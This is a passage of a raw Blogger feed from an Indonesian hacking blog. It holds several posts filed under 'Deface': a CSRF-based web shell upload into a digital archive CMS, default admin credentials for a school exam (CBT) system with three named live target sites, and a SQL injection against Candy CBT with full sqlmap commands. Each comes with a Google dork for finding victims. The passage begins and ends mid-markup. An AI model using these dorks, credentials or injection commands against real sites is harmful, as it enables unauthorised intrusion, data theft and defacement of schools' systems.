src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFurvBEVGKhXodgiUV9eOSPHK3CTVsB00dU8mVLRAl0Fw2efxTZjwENCVJkGrboIJfkqLts0TEt3KtEumLkJ8hhPTDbxIujPvlCZDw01HkD-2WOgN4bpLW0wy8oPTOexi2wEqMOYOGRD4N/s320/test1.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhv3wfrGFkq83TgA_tPNTy9xcoFVmiVfbmNlhMHu8IuZhDXWyu-WIeTW6FBkDeMdmdi2YGv4O8s8PiFGayX2xJwa5hYBZSDyo1ClLON6Ji-NinCJKsOAclNwCis1n5aQ0qFi0qXzLOG48pV/s1366/test2.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;732&quot; data-original-width=&quot;1366&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhv3wfrGFkq83TgA_tPNTy9xcoFVmiVfbmNlhMHu8IuZhDXWyu-WIeTW6FBkDeMdmdi2YGv4O8s8PiFGayX2xJwa5hYBZSDyo1ClLON6Ji-NinCJKsOAclNwCis1n5aQ0qFi0qXzLOG48pV/s320/test2.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div&gt;Sama seperti kita melakukan command atau perintah CLI di terminal seperti &#39;ls&#39; didalam operasi sistem Linux dan Unix atau &#39;dir&#39; dalam operasi sistem Windows.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Selain itu juga memungkinkan adanya DirList bisa diakibatkan adanya exploitasi di sistem perangkat lunak menggunakan perintah khusus (payload atau command)&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;i&gt;Dampak kerentanan dari DirList&lt;/i&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;Dampak dari DirList adalah Information Diclosure yang artinya seseorang dapat melihat informasi file dari dalam folder atau dir tersebut.&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Hal tersebut sangat fatal karna seseorang bisa melihat file-file yang penting seperti backup sql, file config, dll jika didalam folder tersebut ada&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;i&gt;Bagaimana mempatchnya ?&lt;/i&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;Memberi disable DirList dengan .htaccess&lt;/div&gt;&lt;/div&gt;&lt;div&gt;Menambahkan file indexs atau disable DirList via Cpanel&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='https://ecchiexploit.blogspot.com/feeds/2789055377130280232/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='https://ecchiexploit.blogspot.com/2021/04/apa-itu-dirlist-directory-listing.html#comment-form' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/2789055377130280232'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/2789055377130280232'/><link rel='alternate' type='text/html' href='https://ecchiexploit.blogspot.com/2021/04/apa-itu-dirlist-directory-listing.html' title='Apa Itu DirList (Directory Listing) ?'/><author><name>Hari | ./EcchiExploit</name><uri>http://www.blogger.com/profile/05595060091488928047</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdAm9oQZUtl-mM7sSuIp2I9yPPKDz8At2k4IzLqjfXGl8guU-WaeH7fwVxXSGHbx0vRxEOdAPYRxmIBz7mnAa3_JXtIK3WOUO_7n3Qgxl-0bbpfnogLIAFC_6yDakniA/s220/IMG-20200408-WA0076.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3mwQNe_QqZrFaYA-2nGytUPJgGxYoL520zEyL2WBvx4pESe7D-txmFgOr5u3DJjpk1XKeoJ230e4DvwxzghnRtAVfMb5fK1a078U8BjPZtRpOJYWgvEL78F2JwKOCCpTUAmxlG1uzeQaW/s72-c/mantap.png" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2116688564507620479.post-6357903075330877018</id><published>2020-10-20T08:19:00.000+07:00</published><updated>2020-10-20T08:19:02.804+07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Deface"/><title type='text'>Arbritrary File Upload In CMS Informasi Arsip Digital With CRSF</title><content type='html'>&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlCbc-CkOMYaPtMLUJy_Jne5SgfpTXvtr_Kj4LlRp67FjN3qLBR43c9vJCidYBZ7FNlHzJLhVmfmXZlSubWGw4Gqm5bZ5_oqMoGVqVKGNmOZGTeaMV39mu-koN0lW6SIYW4xJlzW8JcYMt/s1280/IMG-20201015-WA0314.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1280&quot; data-original-width=&quot;915&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlCbc-CkOMYaPtMLUJy_Jne5SgfpTXvtr_Kj4LlRp67FjN3qLBR43c9vJCidYBZ7FNlHzJLhVmfmXZlSubWGw4Gqm5bZ5_oqMoGVqVKGNmOZGTeaMV39mu-koN0lW6SIYW4xJlzW8JcYMt/s320/IMG-20201015-WA0314.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;Kali ini Ane Akan Share Exploit Di Cms Informasi Arsip Digital..&amp;nbsp;&lt;/p&gt;&lt;p&gt;Yap Mungkin Ini Adalah Exploit Baru Yang Ane Baca Dari Salah Satu Blogger Yang Bernama&amp;nbsp;&lt;a href=&quot;https://www.jawabaratcyber.asia/2020/10/tutorial-deface-cms-sistem-informasi.html?m=1&quot;&gt;Jawa Barat Cyber&lt;/a&gt;&amp;nbsp;Di Exploit Kali Ini Kalian Tidak Perlu Login Langsung Upload Shell Saja Menggunakan Crsf Yang Saya Buat Sendiri...&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;i&gt;Dork :&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-style: italic;&quot;&gt;&quot;sistem informasi arsip digital&quot; + login&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;Csrf :&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: center;&quot;&gt;&lt;script src=&quot;https://pastebin.com/embed_js/XUed7c5w?theme=dark&quot;&gt;&lt;/script&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;Nah Kalian Copas Saja Csrf Itu Lalu Masukan Site Yang Menurut Kalian Vuln..&amp;nbsp;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;Jika Sudah Memasukan Site Ke CSRF Nya Kalian Jalankan Csrf Tersebut Di App Browser Kalian Seperti Chrome Uc Browser Dll&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;Lalu Kalian Upload Shell Kalian Dengan Ext php5 Atau phtml...&amp;nbsp;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;Jika Success Akan Ke Redirect Ke Login Pagenya...&amp;nbsp;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;Untuk Akses Shell Nya Kalian Tinggal Ke Directory Arsip Nya :&lt;/p&gt;&lt;p style=&quot;text-align: center;&quot;&gt;&lt;i&gt;&lt;u&gt;http://example.com/arsip/shell.php&lt;/u&gt;&lt;/i&gt;&lt;/p&gt;&lt;p style=&quot;text-align: center;&quot;&gt;&lt;i&gt;&lt;u&gt;Or&lt;/u&gt;&lt;/i&gt;&lt;/p&gt;&lt;p style=&quot;text-align: center;&quot;&gt;&lt;i&gt;&lt;u&gt;http://example.com/[path]/arsip/shell.php&lt;/u&gt;&lt;/i&gt;&lt;/p&gt;&lt;p style=&quot;text-align: center;&quot;&gt;&lt;i&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/i&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;And Boom..&amp;nbsp;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMisB13IgprieI0cXN1Ici8JHX0KW6zN18jU3TFGMeefVHQHM33fPxaAZ-4DWvK3sMis3CXtU0EVN5B6y_Sg-ATuV9UklIFLg4Buk_ePS7ayGmvXq5GzTTHdRWSutMBuYXr3V-3Es5O6Uw/s1280/S01020-081656.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1280&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMisB13IgprieI0cXN1Ici8JHX0KW6zN18jU3TFGMeefVHQHM33fPxaAZ-4DWvK3sMis3CXtU0EVN5B6y_Sg-ATuV9UklIFLg4Buk_ePS7ayGmvXq5GzTTHdRWSutMBuYXr3V-3Es5O6Uw/s320/S01020-081656.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;p style=&quot;text-align: left;&quot;&gt;Sekian Dan Happy Hacking...&amp;nbsp;&lt;/p&gt;</content><link rel='replies' type='application/atom+xml' href='https://ecchiexploit.blogspot.com/feeds/6357903075330877018/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='https://ecchiexploit.blogspot.com/2020/10/arbritrary-file-upload-in-cms-informasi.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/6357903075330877018'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/6357903075330877018'/><link rel='alternate' type='text/html' href='https://ecchiexploit.blogspot.com/2020/10/arbritrary-file-upload-in-cms-informasi.html' title='Arbritrary File Upload In CMS Informasi Arsip Digital With CRSF'/><author><name>Hari | ./EcchiExploit</name><uri>http://www.blogger.com/profile/05595060091488928047</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdAm9oQZUtl-mM7sSuIp2I9yPPKDz8At2k4IzLqjfXGl8guU-WaeH7fwVxXSGHbx0vRxEOdAPYRxmIBz7mnAa3_JXtIK3WOUO_7n3Qgxl-0bbpfnogLIAFC_6yDakniA/s220/IMG-20200408-WA0076.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlCbc-CkOMYaPtMLUJy_Jne5SgfpTXvtr_Kj4LlRp67FjN3qLBR43c9vJCidYBZ7FNlHzJLhVmfmXZlSubWGw4Gqm5bZ5_oqMoGVqVKGNmOZGTeaMV39mu-koN0lW6SIYW4xJlzW8JcYMt/s72-c/IMG-20201015-WA0314.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2116688564507620479.post-582261608777061490</id><published>2020-10-19T04:11:00.000+07:00</published><updated>2020-10-19T04:11:22.821+07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Deface"/><title type='text'>Exploit Bimasoft CBT Default User/Pass</title><content type='html'>&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZVNFjwM8URoBZrlljTtgNw-BxR7mjzj-lZBkzu1F5_c8vuvNSj8wV_KgUUh6XVtEOygHH1GtpAciH1E-_bPDCjUYO6Zb_z6n45E5KXbSVIoeq0GY07C6TStNvjh_r0yauJN4KzbfTaVM8/s1280/IMG-20201015-WA0307.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;824&quot; data-original-width=&quot;1280&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZVNFjwM8URoBZrlljTtgNw-BxR7mjzj-lZBkzu1F5_c8vuvNSj8wV_KgUUh6XVtEOygHH1GtpAciH1E-_bPDCjUYO6Zb_z6n45E5KXbSVIoeq0GY07C6TStNvjh_r0yauJN4KzbfTaVM8/s320/IMG-20201015-WA0307.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;Hallo Gann...&amp;nbsp;&lt;/p&gt;&lt;p&gt;Dah Lama Neh Ane Gak Nge Post Tentang Cbt Lagi..&amp;nbsp;&lt;/p&gt;&lt;p&gt;Nah Di Post Kali Ini Ane Akan Share Tentang Cbt Bernama Bimasoft Sayangnya Cbt Ini Menggunakan Cms Wordpress Dan Tidak Bisa Meng Upload Shell Wkwkw...&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;i&gt;User/Pass :&lt;/i&gt;&lt;/p&gt;&lt;p style=&quot;text-align: center;&quot;&gt;&lt;b&gt;&lt;i&gt;admin/admincbt&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: center;&quot;&gt;&lt;b&gt;&lt;i&gt;Or&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: center;&quot;&gt;&lt;b&gt;&lt;i&gt;Username : admin&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: center;&quot;&gt;&lt;b&gt;&lt;i&gt;Password :admincbt&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;i&gt;Dork :&amp;nbsp;&lt;/i&gt;&lt;/p&gt;&lt;p style=&quot;text-align: center;&quot;&gt;&lt;i&gt;&lt;b&gt;&quot;aplikasi simulasi mandiri&quot; + login&lt;/b&gt;&lt;/i&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;i&gt;Admin Login Page :&lt;/i&gt;&lt;/p&gt;&lt;p style=&quot;text-align: center;&quot;&gt;&lt;i&gt;&lt;b&gt;http://example.com/wp-login.php&lt;/b&gt;&lt;/i&gt;&lt;/p&gt;&lt;p style=&quot;text-align: center;&quot;&gt;&lt;i&gt;&lt;b&gt;http://bimasoftcbt.example.com/wp-login.php&lt;/b&gt;&lt;/i&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;i&gt;Live Target :&lt;/i&gt;&lt;/p&gt;&lt;p style=&quot;text-align: center;&quot;&gt;&lt;/p&gt;&lt;ul&gt;&lt;li style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;https://bimasoftcbt.utbk.my.id&lt;/i&gt;&lt;/b&gt;&lt;/li&gt;&lt;li style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;https://bimasoftcbt.smansawi.id&lt;/i&gt;&lt;/b&gt;&lt;/li&gt;&lt;li style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;https://bimasoftcbt.smpkc191.my.id&lt;/i&gt;&lt;/b&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;Sekian Semoga Bermanfaat Gan (Bermanfaat Apanya Ini Kan Ngehek Bujankkk Pala Ente Bermanfaat :&#39;v)&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;Happy Exploit...&amp;nbsp;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;</content><link rel='replies' type='application/atom+xml' href='https://ecchiexploit.blogspot.com/feeds/582261608777061490/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='https://ecchiexploit.blogspot.com/2020/10/exploit-bimasoft-cbt-default-userpass.html#comment-form' title='3 Komentar'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/582261608777061490'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/582261608777061490'/><link rel='alternate' type='text/html' href='https://ecchiexploit.blogspot.com/2020/10/exploit-bimasoft-cbt-default-userpass.html' title='Exploit Bimasoft CBT Default User/Pass'/><author><name>Hari | ./EcchiExploit</name><uri>http://www.blogger.com/profile/05595060091488928047</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdAm9oQZUtl-mM7sSuIp2I9yPPKDz8At2k4IzLqjfXGl8guU-WaeH7fwVxXSGHbx0vRxEOdAPYRxmIBz7mnAa3_JXtIK3WOUO_7n3Qgxl-0bbpfnogLIAFC_6yDakniA/s220/IMG-20200408-WA0076.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZVNFjwM8URoBZrlljTtgNw-BxR7mjzj-lZBkzu1F5_c8vuvNSj8wV_KgUUh6XVtEOygHH1GtpAciH1E-_bPDCjUYO6Zb_z6n45E5KXbSVIoeq0GY07C6TStNvjh_r0yauJN4KzbfTaVM8/s72-c/IMG-20201015-WA0307.jpg" height="72" width="72"/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2116688564507620479.post-5871901997353442805</id><published>2020-09-24T19:46:00.000+07:00</published><updated>2020-09-24T22:50:01.492+07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Deface"/><title type='text'>Sql Injection In New Candy Cbt &gt; V2.8 rev 4 With Sqlmap</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZaOs3_IM1Rm3o-lHxnBRjK71ByAMsvIvyelNS0MAcqhAadVAQ-eKV4G6vjep-lIQHT9AsOw54Pn4A75yaAGMU778ja4sXUnmh8oiDvBEE00DCIZc8S-iQFcOtaDGJQBC5jX-fBa6RKglJ/s1600/IMG-20200920-WA0288.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1109&quot; data-original-width=&quot;1109&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZaOs3_IM1Rm3o-lHxnBRjK71ByAMsvIvyelNS0MAcqhAadVAQ-eKV4G6vjep-lIQHT9AsOw54Pn4A75yaAGMU778ja4sXUnmh8oiDvBEE00DCIZc8S-iQFcOtaDGJQBC5jX-fBa6RKglJ/s320/IMG-20200920-WA0288.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
Jadi Gini Banyak Yang Komentar Cari Exploit Candy Cbt Yang 2.8 rev 4 ampe 2.9 atau versi terbarunya nah disini ane akan share exploit terbarunya untuk versi tersebut..&lt;br /&gt;
&lt;br /&gt;
Untuk Bahan²nya kalian install sqlmap di terminal kalian seperti termux cmd dan lain-lain&lt;br /&gt;
&lt;br /&gt;
Jika kalian tidak suka yang lebih ribet install lazysqlmap untuk command nya sama seperti sqlmap hanya di lazysqlmap lebih mudah aja untuk men dump table dan column nya&lt;br /&gt;
&lt;br /&gt;
Install Sqlmap&amp;nbsp;&lt;a href=&quot;https://github.com/sqlmapproject/sqlmap&quot; target=&quot;_blank&quot;&gt;Disini&lt;/a&gt;&amp;nbsp;Dan Install Lazysqlmap&amp;nbsp;&lt;a href=&quot;https://github.com/Yukinoshita47/lazysqlmap&quot; target=&quot;_blank&quot;&gt;Disini&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Login Admin :&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;u&gt;&lt;i&gt;http://example.com/x-panel/&lt;/i&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
Or&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;u&gt;&lt;i&gt;http://example/[path]/x-panel/&lt;/i&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;u&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
Exploit :&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;&lt;u&gt;http://example.com/x-panel/?pg=banksoal&amp;amp;ac=lihat&amp;amp;id=990&lt;/u&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
Or&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;&lt;u&gt;http://example.com/[path]/x-panel/?pg=banksoal&amp;amp;ac=lihat&amp;amp;id=990&lt;/u&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
Command In Sqlmap :&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;u&gt;&lt;i&gt;python2 sqlmap.py -u &quot;http://example.com/x-panel/?pg=banksoal&amp;amp;ac=lihat&amp;amp;id=990&quot; --dbs --time-sec 20 -v 3 --random-agent --level 1 --risk 1&amp;nbsp;&lt;/i&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
Or&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;u&gt;&lt;i&gt;python2 sqlmap.py -u &quot;http://example.com/[path]/x-panel/?pg=banksoal&amp;amp;ac=lihat&amp;amp;id=990&quot; --dbs --time-sec 20 -v 3 --random-agent --level 1 --risk 1&lt;/i&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;u&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
Command In Lazysqlmap :&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
$lazysqlmap&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;&lt;u&gt;http://example.com/x-panel/?pg=banksoal&amp;amp;ac=lihat&amp;amp;id=990 --dbs --time-sec 20 -v 3 --random-agent --level 1 --risk 1&lt;/u&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
jika Kalian Ada Pertanyaan Seperti Ini Saat Sqlmap Di Jalankan :&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;&lt;u&gt;[DEBUG] declared web page charset &#39;utf-8&#39;&lt;/u&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;&lt;u&gt;got a 302 redirect to&lt;/u&gt;&lt;/i&gt;&lt;/div&gt;
&lt;br /&gt;
Ketik Aja : n (n = no)&lt;br /&gt;
Itu artinya untuk meredirect ke halaman index nya jadi kita tidak perlu menredirectnya&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;&lt;u&gt;you have not declared cookie(s), while server wants to set its own (&#39;PHPSESSID=blabla&#39;).&lt;/u&gt;&lt;/i&gt;&lt;/div&gt;
&lt;br /&gt;
Dan Untuk Ini Kalian Ketik Aja : Y (Y = Yes)&lt;br /&gt;
Ini adalah cookie dari web tersebut jadi kita membutuhkanya untuk melakukan injeksi lebih extrim lagi&lt;br /&gt;
&lt;br /&gt;
Nah pas kalian melakukan injection di sqlmap atau lazysqlmap kalian skip aja injeksi di parameter nya hingga ke parameter &quot;id&quot; lalu tunggu hingga injeksi selesai&lt;br /&gt;
&lt;br /&gt;
Dan boom..&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtXO7QAW_Zdf0y8ZIY2ODLZVQPevAgUvoYIMwC_iwczRsAhxbvHF75c4T-jdzZ67Uc2hl7zwRwjozY5p0BnMDwBQlWE0Z0A0hclbBN6AhKHkDr_ht4o8E8fLPrca9TIcYUQmqjYPq1OUD-/s1600/S00924-18443777.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1501&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtXO7QAW_Zdf0y8ZIY2ODLZVQPevAgUvoYIMwC_iwczRsAhxbvHF75c4T-jdzZ67Uc2hl7zwRwjozY5p0BnMDwBQlWE0Z0A0hclbBN6AhKHkDr_ht4o8E8fLPrca9TIcYUQmqjYPq1OUD-/s320/S00924-18443777.jpg&quot; width=&quot;153&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
Untuk Meng dump tabel dan column nya kalian search aja di google..&lt;br /&gt;
&lt;br /&gt;
Sebenernya tadi gua mau jelasin 1 1 command di sqlmap tapi gak jadi wkwkw&lt;br /&gt;
&lt;br /&gt;
Yap segitu aja untuk exploit kali ini..</content><link rel='replies' type='application/atom+xml' href='https://ecchiexploit.blogspot.com/feeds/5871901997353442805/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='https://ecchiexploit.blogspot.com/2020/09/sql-injection-in-new-candy-cbt-v28-rev.html#comment-form' title='5 Komentar'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/5871901997353442805'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/5871901997353442805'/><link rel='alternate' type='text/html' href='https://ecchiexploit.blogspot.com/2020/09/sql-injection-in-new-candy-cbt-v28-rev.html' title='Sql Injection In New Candy Cbt &gt; V2.8 rev 4 With Sqlmap'/><author><name>Hari | ./EcchiExploit</name><uri>http://www.blogger.com/profile/05595060091488928047</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdAm9oQZUtl-mM7sSuIp2I9yPPKDz8At2k4IzLqjfXGl8guU-WaeH7fwVxXSGHbx0vRxEOdAPYRxmIBz7mnAa3_JXtIK3WOUO_7n3Qgxl-0bbpfnogLIAFC_6yDakniA/s220/IMG-20200408-WA0076.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZaOs3_IM1Rm3o-lHxnBRjK71ByAMsvIvyelNS0MAcqhAadVAQ-eKV4G6vjep-lIQHT9AsOw54Pn4A75yaAGMU778ja4sXUnmh8oiDvBEE00DCIZc8S-iQFcOtaDGJQBC5jX-fBa6RKglJ/s72-c/IMG-20200920-WA0288.jpg" height="72" 